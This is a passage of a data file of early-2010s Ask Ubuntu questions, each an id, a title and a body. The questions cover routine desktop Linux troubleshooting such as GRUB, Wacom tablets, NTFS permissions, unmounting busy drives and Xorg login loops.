batterymonitorprocitem ] hiding battery item ( capacity=0 ) max_capacity=-1 ) ( onbattery=false ) [ info 09:48:17.999 ] [ pluginmanager ] loaded `` mounter '' . [ debug 09:48:18.238 ] [ mountprovider ] adding 116 gb filesystem . [ info 09:48:18.241 ] [ pluginmanager ] loaded `` bookmarks '' . [ debug 09:48:18.247 ] [ bookmarksitemprovider ] updating bookmarks . [ info 09:48:18.531 ] [ pluginmanager ] loaded `` cpu monitor '' . [ info 09:48:19.412 ] [ helper ] starting banshee_control.py [ info 09:48:19.693 ] [ helper ] starting deluge_badge.py [ info 09:48:19.700 ] [ helper ] starting gajim_badge.py [ info 09:48:19.716 ] [ helper ] starting liferea_badge.py [ info 09:48:19.738 ] [ helper ] starting pidgin_control.py [ info 09:48:19.778 ] [ helperservice ] helper added : /usr/share/docky/helpers/banshee_control.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/deluge_badge.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/gajim_badge.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/gtg_menus.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/liferea_badge.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/open_terminal_here.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/pidgin_control.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/rhythmbox_control.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/tomboy_menus.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/zeitgeist_docky.py [ info 09:48:19.779 ] [ helperservice ] helper added : /usr/share/docky/helpers/zeitgeist_journal.py [ info 09:48:20.376 ] [ drawingservice ] could not find 'gajim ' , using fallback of 'extension ' . [ info 09:48:22.865 ] [ helper ] deluge_badge.py : : no module named deluge.ui.client [ info 09:48:22.892 ] [ helper ] deluge_badge.py has exited ( code 0 ) . [ error 09:48:33.678 ] [ systemservice ] error opening files . the application does n't support files/uris or was n't found .
11690	how can i make the terminal stay on top	every time i use the terminal i have to right click on the title bar and click `` always on top '' . is there anyway of making it do this automatically . that would be really cool . : d
11694	why would removing gnash also remove gnome-desktop-enviroment ?	i 've been having flash troubles with my firefox . someone from some place suggested trying gnash . it worked for a while but while it re-enabled flash player on youtube , it is still incompatible with other flash apps out there . when i tried to remove it , it says it will also remove gnome-desktop-environment . why ? why should removing gnash , a mere flash plugin , remove my desktop environment ?
11699	does a new user 's settings affect the main user 's settings ?	if i create a new user account , with different themes , icon sets , sounds , cursors and different programs , will it affect the original user 's settings ?
11703	name disappeared from main menu bar	i have ubuntu 10.4 . i installed a nvidia gigabyte geforce 210 graphic card because the intel graphic card is a disaster . i use a terminal and basic , fiddly adjustments were successfully made to get the window to fit the screen . the new card is a roaring success . nothing freezes and visuals can be set to extra . but , from that point on , my main menu bar misbehaved and icons kept disappearing . logon and logoff usually helped . r-e-i-s-u-b was needed when the actual logoff icon disappeared . my full name , anthony burman , appeared in the main menu bar . it was alonside wanda , the fish , the oracle ... . my name disappeared and i can not get it back . it ca n't be found anywhere in the 'add to panel ' section . indicator applet session also ca n't bring it back . how do i re-insert my name on the toolbar ? thanks , ant .
11709	how can i capture network traffic of a single process ?	i would like to examine the network traffic being handled by a single process , but simple network captures wo n't work since i am dealing with such a busy system ( lots of other traffic happening at the same time ) . is there a way to isolate a tcpdump or wireshark capture to the networking traffic of a single specific process ? ( using netstat is insufficient . )
11712	changing program privileges	i installed a codec under the root user in my ubuntu 10.04 installation . as you guessed , i ca n't play a movie using the codec under my normal user account . how do i rectify the problem ?
11713	how do i find out which process is preventing a umount ?	when i do sudo umount /media/kingston i got umount : /media/kingston : device is busy . i close all the windows and make sure all shell are pointing to other directories . how can i find which process is preventing the umount ?
11715	why is rsync recopying a lot of file when i sync to an usb key ?	when i do an rsync to usb key using -t , it still copy a lot of file . why ?
11719	switching < and ^ with german layout	i am stuck with that keyboard , unfortunately , the ^ and < are switched . makes it hard for me to write code . the < right now is next to 1 and the ^ is next to the y. i want them switched back to their normal positions . i have picked the german layout and the apple aluminum keyboard in my system prefs . did n't help . this problem also exists in ubuntu 12.04 with an apple aluminum keyboard ( swiss layout ) . there are no options to switch these two keys .
11723	can i use dd command to backup a partition on a ftp server ?	can i use the dd command to backup a file on a ftp server rather than network share ?
11724	how to force skype 's panel icon to show skype 's main window in workspace 4 specifically ?	i would like to have skype appear in workspace 4 only , but sill have its panel icon showing in all workspaces . skype can have several sub-windows , and i want to contain them all to workspace 4 ... the skype 's panel icon is only in the panel when skype is running , so there may be two sides to this ... starting skype 's main window for the first time via the main menu re-displaying the hidden skype main-window by clicking the panel icon
11729	will there be an install script to install unity on non-ubuntu distributions ?	this is less a question to the developers of unity and canonical than a question about ubuntu itself so please excuse me if this question does n't belong on this site . while the question seems to speak for itself , maybe the word install script is a little abstract ; i 'm talking about a script which not only checks for the required dependencies but also patches gnome libraries and such . as a programmer , i know this is a lot of work and i ca n't ask the ubuntu developers to spend their time on other distributions but , in the case that an install script is entirely impossible , there should at least be a document with guidelines on how to install unity , patch gnome and what is required to take the necessary steps .
11730	installing e text editor	i am trying to get e-text editor to run . i read http : //www.e-texteditor.com/forum/viewtopic.php ? p=14953 # 14953 and compile e-text editor on linux as well . but on my 10.04 lucid it fails at the following step : ./build_externals_linux.sh debug with the following error messages : building debug binaries building 32-bit binaries going to place output in /opt/etexteditor/external/out.debug ./build_externals_linux.sh : line 41 : pushd : bakefile : no such file or directory ./build_externals_linux.sh : line 42 : ./configure : no such file or directory can not compile bakefile ./build_externals_linux.sh : line 46 : popd : directory stack empty ./build_externals_linux.sh : line 49 : pushd : metakit : no such file or directory ./build_externals_linux.sh : line 50 : cd : builds : no such file or directory can not compile metakit ./build_externals_linux.sh : line 56 : popd : directory stack empty ./build_externals_linux.sh : line 59 : pushd : pcre : no such file or directory ./build_externals_linux.sh : line 60 : ./configure : no such file or directory can not compile pcre ./build_externals_linux.sh : line 66 : popd : directory stack empty ./build_externals_linux.sh : line 69 : pushd : tinyxml : no such file or directory make : *** no rule to make target `clean ' . stop . can not compile tinyxml ./build_externals_linux.sh : line 77 : popd : directory stack empty ./build_externals_linux.sh : line 80 : pushd : libtommath : no such file or directory make : *** no rule to make target `clean ' . stop . can not compile ltm ./build_externals_linux.sh : line 85 : popd : directory stack empty ./build_externals_linux.sh : line 88 : pushd : libtomcrypt : no such file or directory make : *** no rule to make target `clean ' . stop . can not compile ltc ./build_externals_linux.sh : line 93 : popd : directory stack empty ./build_externals_linux.sh : line 96 : pushd : wxwidgets : no such file or directory ./build_externals_linux.sh : line 97 : ./configure : no such file or directory can not compile wxwidgets ./build_externals_linux.sh : line 104 : popd : directory stack empty ./build_externals_linux.sh : line 107 : pushd : webkit : no such file or directory make : *** no rule to make target `clean ' . stop . ./build_externals_linux.sh : line 109 : ./webkittools/scripts/build-webkit : no such file or directory can not compile webkit ./build_externals_linux.sh : line 113 : popd : directory stack empty what am i missing ?
11732	choppy video in pitivi	i am trying to edit 720p mov video footage in pitivi , and when i place 1 clip in the timeline it plays fine in realtime . the problem begins when i add another clip and try to edit . besides the 1st clip ( that continues to run in realtime ) , all the other clips or cuts are choppy . i currently have 3gigs of ram and an intel duo core processor . and using 10.10 . is there something i can try ? i 've heard of kdenlive , is it better that pitivi in handling 720p footage ? thank you very much !
11737	accessing my samsung f480t through nautilus	ubuntu is n't detecting my samsung f480t when i plug it in . after a bit of googling , i found nothing . do samsung phones require a driver to be installed to work ?
11738	force gdm login screen to the primary monitor	i have two monitors attached to my video card . primary monitor has a resolution equal to 1280x1024 and the second has 1920x1200 . my gdm login screen always appears on the second monitor even if it is switched off . my question is how to force gdm to show the login screen always on the primary monitor with resolution 1280x1024 ? i use nvidia gt9500 videcard in twinview mode . i ca n't use xinerama because vpdau does n't work correclty in this mode . what i have found is that mouse pointer always appears in the center of union of the screens and center is always on the monitor with higher resolution . login screen always shows where mouse cursor is . now my primary monitor has a resolution equal to 1920x1080 . the problem still persists , mouse cursor always appears in the right-bottom corner of the second monitor .
11740	copy filename in nautilus , pastes different formats in terminal vs normal text field	i often copy fully qualified filenames from nautilus ... however i get a different paste result when i paste it into a terminal vs. when i paste it into a `` normal '' text field ( eg . a text editor , or web page ) . i do know that the clipboard can contain any number of `` paste formats '' ... from standard-locale text format , to specialized word-processor rich-text format , to a full uri format of a file-object , etc ... so there is nothing `` wrong '' here ; i just want a workaround to allow me to copy a filename from nautilis , and paste a `` normal '' text format into the terminal ... assuming this file /home/fred/a c here is a copy/paste example ... ( copy it in nautilus , using < ctrl > c ) # paste into `` normal '' text field using < ctrl > v /home/fred/a c # paste into terminal using < ctrl > < shift > v file : ///home/fred/a % 20c # with a trailing space ! is there some way i can copy only a simple text format into the clipboad in nautilus ... ... or is there a way to paste the simple text format into terminal , rather than the uri format ?
11746	how to hide files with a specific extension	i have set of temp files created in my folder with .bak extensions . how can i make them hide by default in ubuntu ? i tried adding a .hidden file with *.bak as entry in the file , but that is not working . any help is very appreciated ...
11748	how to move files into /usr/bin in nautilus without getting permission errors	i 'm trying to move some files into /usr/bin in nautilus but i 'm getting permission errors . i know i can do it via the terminal using sudo but how can i do it in nautilus ? i would expect it to popup a box for me to enter my password like the admin screens in ubuntu but it does n't .
11755	programs ' title bar dissapear	i have the next problem : the programs ' title bar just dissapear and i ca n't move the windows , maximize , etc . it occurs when i turn on the computer , but not always . is it a bug or something ? ? i 've searched and i found that the command metacity -replace worked for my problem anyone knows why it happened . i have compiz but i had it dissabled when it happened .
11758	how can i set the clock to 24 hour mode ?	how can i set the clock to global ( 24h time ) in maverick instead of am/pm ? including the login screen ? i mean there 's no option to do that in rclick clock > preferences or in system > admin > time & date .
11759	game like team buddies but open-source ?	im looking for a game like team buddies ( video ) , with online multiplayer mode for ubuntu.. possibly open-source . anyone know something similar ?
11760	what is the difference between `` gksudo nautilus '' and `` sudo nautilus '' ?	i 've been using gksudo nautilus and sudo nautilus through alt+f2 . what 's the difference ? they look very similar !
11767	where can i find vagrant packages ?	vagrant is a tool to build and manage virtual machines for developers . it has a getting started on ubuntu guide that contains iffy-looking suggestions like $ sudo ln -s /usr/bin/ruby1.8 /usr/bin/ruby # wtf ? ? ? or installing rubygems from source rather than from ubuntu packages , and then using gem install to install vagrant itself . i 'm not feeling comfortable just following those instructions . is there perhaps a ppa ? are there , perhaps , alternative tools that are packaged for ubuntu ?
11771	what are 11.04 's system requirements ?	will - and when how much â will the system requirements approximately increase for 11.04 .
11773	embedding external urls behind text in tomboy	is there any way to embed a url to an external web page in the text of a tomboy note , in the same way that other notes are linked to ? i know i can just pates the url into the note and have it link out , but when the link is over a hundred characters long ( not kidding ) and i have a lot of them then that stops being an option .
11774	screensaver forces logout ?	i am using the most recent ubuntu desktop edition 10.10 . everything works fine , except the screensaver . instead of going to the screensaver the os forces a logout and all my apps are shutdown . forums suggested checkboxing the 'lock screen when screensaver active ' box , as well as using non gl 3d graphics screensavers , both of which i have tried to no avail . btw : i can preview screensavers just fine . thanks for any recommendations !
11775	convert grub entry to grub2 entry ?	so here 's the thing . i have two partition in my netbook ( plus swap ) : /dev/sda4 with ubuntu 10.4 /dev/sda5 with centos 5.5 i use ubuntu obviously . centos is there because i need to run some test on that distro . the problem is centos uses grub and ubuntu uses grub2 . this is /boot/grub/menu.lst from centos : default=0 timeout=5 splashimage= ( hd0,4 ) /boot/grub/splash.xpm.gz title centos ( 2.6.18-194.17.4.el5xen ) root ( hd0,4 ) kernel /boot/xen.gz-2.6.18-194.17.4.el5 module /boot/vmlinuz-2.6.18-194.17.4.el5xen ro root=label=/1 rhgb quiet module /boot/initrd-2.6.18-194.17.4.el5xen.img title centos ( 2.6.18-194.el5xen ) root ( hd0,4 ) kernel /boot/xen.gz-2.6.18-194.el5 module /boot/vmlinuz-2.6.18-194.el5xen ro root=label=/1 rhgb quiet module /boot/initrd-2.6.18-194.el5xen.img the /boot/grub/grub.cfg from ubuntu : menuentry `` centos release 5.5 ( final ) ( on /dev/sda5 ) '' { insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set 66daaf1a-53b0-4e12-96f3-db01d52e12d1 linux /boot/vmlinuz-2.6.18-194.17.4.el5xen root=/dev/sda5 } menuentry `` centos release 5.5 ( final ) ( on /dev/sda5 ) '' { insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set 66daaf1a-53b0-4e12-96f3-db01d52e12d1 linux /boot/vmlinuz-2.6.18-194.el5xen root=/dev/sda5 } this was generated running update-grub2 and grub-install under ubuntu . it 's not working . it gives me something like bad magic number . how can i convert the grub1 entry in a grub2 shape ?
11776	missing /dev/dsp* - what do i need to do/install for sound input from mencoder ?	linux sound is generally very confusing to me , especially when two different machines running the same version of ubuntu do n't behave at all the same way . i 'm trying to use mencoder to record a video stream to an avi file . from one of my laptops ( an hp dv7 ) it works exactly as some random ubuntu wiki post says it should with this command : mencoder tv : // -tv driver=v4l2 : width=640 : height=480 : device=/dev/video0 : forceaudio : adevice=/dev/dsp1 -ovc lavc -oac mp3lame -lameopts cbr : br=64 : mode=3 -o webcam.avi on another laptop ( a lenovo ideapad u460 ) , that fails because there 's no /dev/dsp1 . there 's no /dev/dsp or /dev/audio anything . there is a /dev/snd directory with various cryptically-named files in it , but i have no idea which is which . the webcam on the lenovo does work ; i 've tried it with cheese . i would however like to at least understand why the systems would be different . ( i have not done a side-by-side installed package comparison , i confess . ) any suggestions on packages to install or diagnostics to perform are welcome . thanks .
11781	where can i find ubuntu posters ?	i 'd like to put up some posters around where i go to school , where would i find some great looking posters , flyers and tips on advocacy ?
11783	converting 10.10 desktop iso to alternate iso	is there any utility available to convert ubuntu-10.10-desktop-i386.iso to alternate cd image file ?
11786	what specs would a tablet need to run painting apps ( mypaint , etc . ) well ?	i want to pick up a tablet or touch-enabled laptop to use for drawing and painting with a stylus . but i 'm not sure whether one of the convertible netbooks from asus and others would have the guts to drive the graphics apps well . ( i generally use mypaint , gimp , and inkscape . ) what do people think would be a minimum usable hardware configuration ? by usable , i mean being able to make a quick stroke with a stylus on a reasonably large mypaint file and not have lag in its appearing on the screen . is the issue mainly ram ? can any of the mobile ( i.e. , netbook ) processors do the job ? all of this is , again , assuming that i 'm running ubuntu .
11787	best hardware choices for multi-seat ( multi-user ) system ?	we are building a multi-seat or multi-user system . the budget for the entire system is around $ 2000 . the tower should be around $ 800 . each user will probably only use the computer for web browsing ( keeping flash to a minimum ) , however , there can be almost no lag . the system should support at least eight , preferably a maximum of 12 , depending on how much of the budget is left ( $ 160 per user ) . the central tower computer itself will be assembled manually . what hardware should be used ? so far , the plan is : at least 1gb ram per user an amd 8-core processor ( opteron magny-cours ) a compatible ( g34 ) motherboard with several pci slots a large hard drive a well-ventilated case are these good choices ? would other hardware be better ? also , each user requires a video card . would it be possible to share a two output multi-monitor video card between two users ?
11789	how to pretend to browse from a different country ?	how to pretend to browse from a different country for view streaming online television from another country or to use programms that do n't work in my country or to buying ( shop ) . edit : the best solution until now ( 11/2012 ) i thing , is to use the add-on anonymox with firefox .
11790	printing on cd/dvd with epson stylus photo r285 ( or similar )	i need to print on cd/dvd with my epson r285 . please indicate a method or ubuntu software for printing on cd/dvd surfaces .
11793	how to change the caffeine icons in panel when using the elementary theme	when i use the elementary theme 2.0 the default caffeine icon is displayed in my top-panel . i found some nice icons thatâll fit the theme better . i followed the instructions on the page and theyâre not working for me . any tips how i can make these icons show up in my panel ?
11798	wireless driver causes frequent system freezes	for the past one month i am facing random freezes on my asus 1005px eeepc . here i have filed a public bug report on launchpad . there i was informed that it is a duplicate of an already reported bug . i was adviced not to shift to ubuntu 10.10 netbook edition in an answer to the question i posted here . by turning off the network services , wireless and also after some tests , i strongly believe that it is caused by the wireless driver . the wireless card is : atheros ar2427 . i have to install the drivers manually by executing this command : sudo apt-get install linux-backports-modules-wireless-maverick-generic there is no response on the bug report page . the issue has become a big pain . many times i have lost very imprortant work because of that bug . please suggest some solution . if there is no solution , atleast tell me how can i avoid system freezes .
11800	how do i change the deskbar applet panel icon ?	is there any way , to change the deskbar-applet-panel icon ? i have checked in /usr/share/deskbar-applet/art , but none of those icons seem to change the panel icon or is there a different path for the icon ( s ) to be found .
11801	gnome- vs unity-panel ( applet ) compatibility ?	i just love the indicator-applet and other parts of the ayatana-project and think ubuntu has done an awesome job there . and as the question about applet compatibility seem to be answered as a 'no ' i 'd like to take the question to the next level - the 'why ' and 'why not ' . how come these ayatana-applets today work in gnome-panel but gnome applets wo n't work in the unity panel ? and - as it 's connected - why not make them compatible ? is n't it all about usability ?
11804	how to tell thunar to stop using my device ?	when i do sudo umount /media/kingston i got umount : /media/kingston : device is busy . by using fuser -c /media/kingston and cat /proc/ < pid > /cmdline i found that the process is thunar -- deamon . i closed all file manager windows . when i try to umount it by right cliking on the desktop , it also gave an error : an application is preventing the volume `` kingston '' from being unmounted i am affraid that killing thunar is going to impact other process running in other terminal . how can i tell it that i do n't need this usb key anymore so it stop using it ?
11805	how to open ssh : //username @ hostname link	i want to open link like `` ssh : //username @ hostname '' with ssh . i think xdg-open can help me ( xdg-open ssh : //username @ hostname ) , but i do n't know how . how can i do it ?
11811	can you change the default wine theme ?	there is a great ambiance theme for wine and windows that i use . but when i create a new wine prefix ( or use playonlinux to do so ) it uses the default ugly grey-and-blue windows 95 theme . is there a way to change wine into automatically using my own theme , i.e . the ambiance theme for new wine prefixes ?
11815	how to install wacom bamboo pen	i have a new wacom bamboo pen . i 'm using ubuntu 10.10 64bit . after googling a little bit , i checked that xserver-xorg-input-wacom was installed . i plugged in my tablet . i rebooted my computer . nothing special happened . i opened inkscape . the tablet did n't work . i opened inkscape 's input devices dialog . i did n't understand anything . i tried to blindly click some options in that dialog but nothing seemed to have any effect . same with gimp . after googling some more i found the linuxwacom website with source code , this did n't seem to work . so ... any help ? as requested : lsusb bus 005 device 002 : id 056a:00d4 wacom co. , ltd dmesg | tail [ 492.961267 ] usb 5-1 : new full speed usb device using uhci_hcd and address 3 [ 493.144862 ] input : wacom bamboo 4x5 pen as /devices/pci0000:00/0000:00:1a.2/usb5/5-1/5-1:1.0/input/input6 [ 493.158854 ] input : wacom bamboo 4x5 finger as /devices/pci0000:00/0000:00:1a.2/usb5/5-1/5-1:1.1/input/input7
11816	gnome equivalent of kdirstat	what is the gnome version of kdirstat ? i read some 2006 post about program named baobab , but it looks like it 's not included in 10.04 any more , and the home page is not available any more .
11819	what webcams are known to work ?	what webcams work out of the box for 10.04 or ubuntu ?
11821	plymouth ugly with nvidia driver ( fix tuto do n't support my resolution )	i recently buy a 1366x768 laptop with nvidia gts 360m ( asus g60jx-rbbx05 ) . i installed the nvidia driver version 256.53 for compatibility issue and now work great . i followed multiple tutorial to fix the very ugly plymouth boot , but no one support 1366x768 , and only support 1024x768 . can i get a normal plymouth with the nvidia driver ?
11823	i am unable to login to my ubuntu machine or reinstall	i started my laptop one day and i got a warning message before the login screen saying ( use/lib/libconf2-4/gconf-sanity-check-2 exited with status 256 ) . trust me , i checked google and all ubuntu forums to find the answer to this before posting my issue here . i found that many people have had the same issue but none of their sulutions worked for me . mostly cause : i ca n't login using gnome so i have to use the command line . everytime i sudo i get something about soduers mode not being 0440 ( when i looked that up and tried to change the mode as some forums suggested , i got an error saying permission denied . ) i tried to 'su to root ' to fix that but then i get something about authentication being wrong ! so it looks quite shut from everywhere and i am really lost . i dont mind reinstalling ubuntu and having all data erased , i already have everything saved on a hard drive , but when i put in the ubuntu install cd , it ejects it before booting from it and refuses to boot from any other cd as well . please help me out i have been trying for 3 weeks now and this is honestly my last resort . thank you so much in advance . i love ubuntu and i want it back .
11825	is the difference between sudo and gksu the same as the difference between sudo -i and sudo -s ?	is the difference between sudo cmd and gksu cmd , the same as the difference between starting a shell with sudo -i and sudo -s ? ... or put another way , is sudo cmd the same as sudo -i cmd and gksu cmd the same as sudo -s cmd ? edit : based on what i read on an ubuntu documentation page where it says : you should never use normal sudo to start graphical applications as root . you should use gksudo ( kdesudo on kubuntu ) to run such programs . gksudo sets home=~root , and copies .xauthority to a tmp directory . this prevents files in your home directory becoming owned by root . ( afaict , this is all that 's special about the environment of the started process with gksudo vs. sudo ) . the `` afaict '' doe n't really give me full confidence that there is nothing more to it . ( ..a belated update : i tested his commemnt today ( 2 months later ) about : '' this prevents files in your home directory becoming owned by root . '' all files i created via sudo/gksu were all owned by `` root '' , and the group was `` root '' . ) i 've read parts of the info sudo and noticed the -i and -s seem to be doing the same thing as the afaict environment issue ... but i hit overload.. so i 've asked my question here . ps.. my question is not about sudo vs gksu .. it is more about : is gksu the same as sudo -s .. and if not , how do they differ ?
11827	login timeout disable ?	how can i disable automatic timeout entries in the login screen ? allow me to explain . my typical experience goes something like this : i put my laptop to sleep , then wake it . when it wakes , it comes up with the login screen . i type in my password and it will usually reject it , with a message indicating the login timer has expired . i then enter my password a second time and it logs in . not the end of the world , but annoying nonetheless . any suggestions ?
11828	trouble setting language	i am really struggling with this language issue . i went to system- > administration- > language support and moved turkish ( tăźrkă§e ) to the top . then i clicked `` apply system-wide '' and restarted . however , after restarting , echo $ lang reported en_us.utf8 , so i logged out and back in - and now it reports tr_cy.utf8 . now here 's the problem : i have a file 'xxx.po ' in /usr/share/locale/tr_cy/lc_messages i run the following python code : import gettext gettext.bindtextdomain ( `` xxx '' , '' /usr/share/locale '' ) gettext.textdomain ( `` xxx '' ) tr = gettext.translation ( `` xxx '' , `` /usr/share/locale '' , [ `` tr_cy '' ] , fallback=true ) print tr.gettext ( `` sample '' ) although 'sample ' should be translated , it is n't . what am i doing wrong ?
11830	why does mysql process starts on boot ?	as you can see , mysql exists only in the /etc/init.d directory and not in /etc/rcn.d , therefore it should n't start on boot . $ sudo find /etc -regex `` .*\ ( rc.*d\|init\.d\ ) . * '' | sudo grep `` mysql '' | sort /etc/init.d/mysql
11835	why does this system freeze if i run any user other than root ? ( gdm , xdm , lxdm , etc )	i 'm on an old desktop ( see the hardinfo report ) : here okay , the problem i have is , i 'm forced to use root ( which is not safe , obviously ) to do anything ! i ca n't log in as a user ( except from a terminal ) , which is very bad , because i 'm not the person who needs to use this system , and because we need to use wine to recover critical data . basically ... i need to find out where the freezing is coming from . noapci , noacpi , nomodeset , etc ... do n't make a difference to the situation . i ca n't tell if it 's a kernel bug , because all that i can tell indicates that , but somehow it seems unrelated ( i mean , startx works as root ! ) . any ideas ? i really need to get this working urgently for the person who needs to use it , to recover very critical data , and as we are not able to buy a new system ... you get the point . our previously working desktop got fried by hurricane tomas . edit we gave up hope on this system ... it start freezing under root , so we 're going to try to backup the data to an external drive ( if we can keep the system active long enough , or with a live cd ) and try to recover the information from the databases etc on another system . not the best solution , but the only one we have .
11839	keep getting kicked back to login screen after xorg -configure	im using ubuntu 9.10 i have the following mobo in the computer : http : //www.netonnet.se/art/dator/datorkomponenter/moderkort/intel-775/asus-p5kpl-amse/127329.4026/ ( asus p5kpl-am se ) the mobo uses a intel gma 3100 integrated graphics card . now on the problem : running glxgears om the computer does not work . googled on the problem and found out that nvidia and ati/radeon drivers interference with the intel drivers . so i uninstalled all nvidida and ati/radeon drivers . then i runned xorg :1 -configure , and then cp /root/xorg.conf.new /etc/x11/xorg.conf but then after a reboot , im notice the login screen graphics are much better . but im unable to login , i only get kicked back to login screen all the time when i enter correct password . ( theres no problem with the password , the system `` senses '' if the correct or incorrect password is specificed ) . i had to go in via ssh , and add `` skljsfjsljfssf '' at the end of xorg.conf to make it `` munged '' . after a reboot , the computer went into low graphics mode and im able to login normally . whats the problem with logging in after having configured xorg ? my /etc/x11/xorg.conf : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` record '' load `` dri '' load `` dbe '' load `` dri2 '' load `` glx '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # available driver options are : - # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` swcursor '' # [ < bool > ] # option `` colorkey '' # < i > # option `` cachelines '' # < i > # option `` dac6bit '' # [ < bool > ] # option `` dri '' # [ < bool > ] # option `` noddc '' # [ < bool > ] # option `` showcache '' # [ < bool > ] # option `` xvmcsurfaces '' # < i > # option `` pageflip '' # [ < bool > ] identifier `` card0 '' driver `` intel '' vendorname `` intel corporation '' boardname `` 82g33/g31 express integrated graphics controller '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
11840	how do i use 'chmod ' on an ntfs ( or fat32 ) partition ?	i have a script that i need to execute on an ntfs partition . the script 's permission is set to 600 . i attempted to modify the permissions by running chmod 755 script.sh , which does n't report a failure or anything - but it also does n't change the permissions on the file : $ stat script.sh file : `script.sh' size : 297070 blocks : 584 io block : 4096 regular file device : 811h/2065d inode : 35515 links : 1 access : ( 0600/-rw -- -- -- - ) uid : ( 1000/ xxxxxx ) gid : ( 1000/ xxxxxx ) access : 2010-09-30 14:05:16.041621000 -0700 modify : 2010-09-30 14:05:05.070157000 -0700 change : 2010-09-30 14:05:05.070475000 -0700 $ chmod 755 script.sh $ stat script.sh file : `script.sh' size : 297070 blocks : 584 io block : 4096 regular file device : 811h/2065d inode : 35515 links : 1 access : ( 0600/-rw -- -- -- - ) uid : ( 1000/ xxxxxx ) gid : ( 1000/ xxxxxx ) access : 2010-09-30 14:05:16.041621000 -0700 modify : 2010-09-30 14:05:05.070157000 -0700 change : 2010-09-30 14:05:05.070475000 -0700 as you can see , it remains unchanged .
11846	changing the default grub font	i 've been able to change the default font of grub , by using grub-mkfont -s 16 -o /boot/grub/grubfont.pf2 font.tty and then adding the following line to /etc/default/grub : grub_font=/boot/grub/grubfont.pf2 and of course sudo update-grub and the new font did show up and everything ( remember to chose a monospaced font ) . but , the `` box '' characters ( around the entries ) are never displayed correctly . i guess most fonts simply do n't have that character set . is there any way that i can add these characters ? maybe even copy them from the default unicode.pf2 font ? if this is not really possible , do you know of any fonts that have got these characters ? update : i have tried a lot of different things , such as converting from ttf to bdf and then to pf2 , and i have tried converting only the ascii characters with the option -- range=0x0-0x7f , but none of them seemed to make it work perfectly . i have a feeling that it is because i 'm generating a larger font than the default , and the default glyphs therefore can not be used . i will try to see if i can get it to work with a smaller font size , though this were one of the reasons i wanted to change the font .
11850	two external hdd but one does not get recognized	i have two hdd on my ubuntu machine . one is a maxtor 320gb and the other is a verbatim 1.5tb . while it automatically recognizes the first one as sdb1 it does n't recognize the latter . i ca n't see it on fdisk either . how can i fix this ? edit : forgot to mention that is an usb with ntfs filesystem .
11854	xsetwacom top and bottom values for wacom bamboo fun 6x8 ?	does anybody know what are the wacom bamboo fun cth-661 correct values for bottomx/bottomy and topx/topy ? i got the tablet to work under 10.10 , but when i move the cursor over the edges of the screen , it jumps a lot ...
11859	virtualise wubi installation on windows	i have installed ubuntu 10.10 on my laptop using wubi . my laptop also has vista installed . would it be possible to somehow run ubuntu ( virtually ? ) while windows is running without having to restart the laptop ?
11863	why does n't burg replace grub ?	burg looks a lot better and user friendly than grub , at the same time it get the job done . why ubuntu have not switched to it ?
11867	how can i install ubuntu on my playstation 3 ?	i 'd like to use the cell processors in a ps3 . given the changes to ps3 firmware recently , what is the best way to get ubuntu installed on a ps3 ?
11885	how do i get alert if someone tries to access my system ?	i am using ubuntu 10.04.i want to get an alert when someone tries to access my sytem.for example if someone access my system as an ssh user i want to get an alert in my system.how to get this type of alerts ?
11887	where are release notes from security updates that were installed in the background ?	my update manager is set up to download and release security updates silently in the background . therefore release notes are no longer displayed . i wonder if there is a way to read the release notes later . how could i find out which updates were installed recently and what bugs are fixed ?
11889	sudo tasksel remove lamp-server	what is the command i ran and now i have no ubuntu left ... when i which the computer on , the monitor comes on , it goes passed the grub screen , it does not show anything after that . how do i fix this ?
